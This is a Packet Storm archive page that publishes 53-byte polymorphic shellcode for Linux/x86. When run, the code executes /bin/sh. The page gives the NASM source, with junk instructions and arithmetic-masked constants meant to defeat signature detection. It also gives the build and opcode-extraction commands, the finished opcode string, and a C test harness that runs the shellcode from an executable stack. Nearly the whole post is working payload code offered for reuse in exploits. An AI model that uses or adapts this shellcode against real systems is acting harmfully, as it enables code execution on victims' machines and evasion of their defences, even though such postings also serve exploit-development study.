exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 execve(/bin/sh) Polymorphic Shellcode

Linux/x86 execve(/bin/sh) Polymorphic Shellcode
Posted Jan 11, 2018
Authored by Debashis Pal

53 bytes small Linux/x86 execve(/bin/sh) polymorphic shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | efb10e1d3784559bfe33bd989b5dc61d8435daba2c91da1483c13af2d0e9765b

Linux/x86 execve(/bin/sh) Polymorphic Shellcode

Change Mirror Download
/*
# Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
# Date: 10-Jan-2018
# Exploit Author: Debashis Pal <debashis.pals[at]gmail.com>
# SLAE-1122
# Tested on: i686 GNU/Linux
# '//bin/sh' = 0x68732f6e 0x69622f2f


########## polymorphic.nasm ##########

global _start
section .text
_start:
add esi, 0x30 ;junk
xor ecx, ecx
mul ecx
mov dword [esp-4], ecx
sub esp, 4
mov esi, 0x353ffc3b
add esi, 0x33333333 ; 0x68732f6e
mov dword [esp-4], esi
mov edi, 0xada67373
sub edi, 0x44444444 ; 0x69622f2f
mov dword [esp-8], edi
sub esp, 8
mov ebx, esp
mov al, 11
int 0x80

####################################

$ nasm -f elf polymorphic.nasm
$ ld -o polymorphic polymorphic.o
$ objdump -d ./polymorphic|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80"
$ gcc -fno-stack-protector -z execstack shellcode.c -o x86PolymorphicShellcodelinux32
$ ./x86PolymorphicShellcodelinux32
Shellcode Length: 53
$ uname -a
Linux kali 4.4.0-kali1-686 #1 SMP Debian 4.4.2-3kali1 (2016-02-23) i686 GNU/Linux
$

####################################

*/


#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35"
"\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44"
"\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80";

int main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close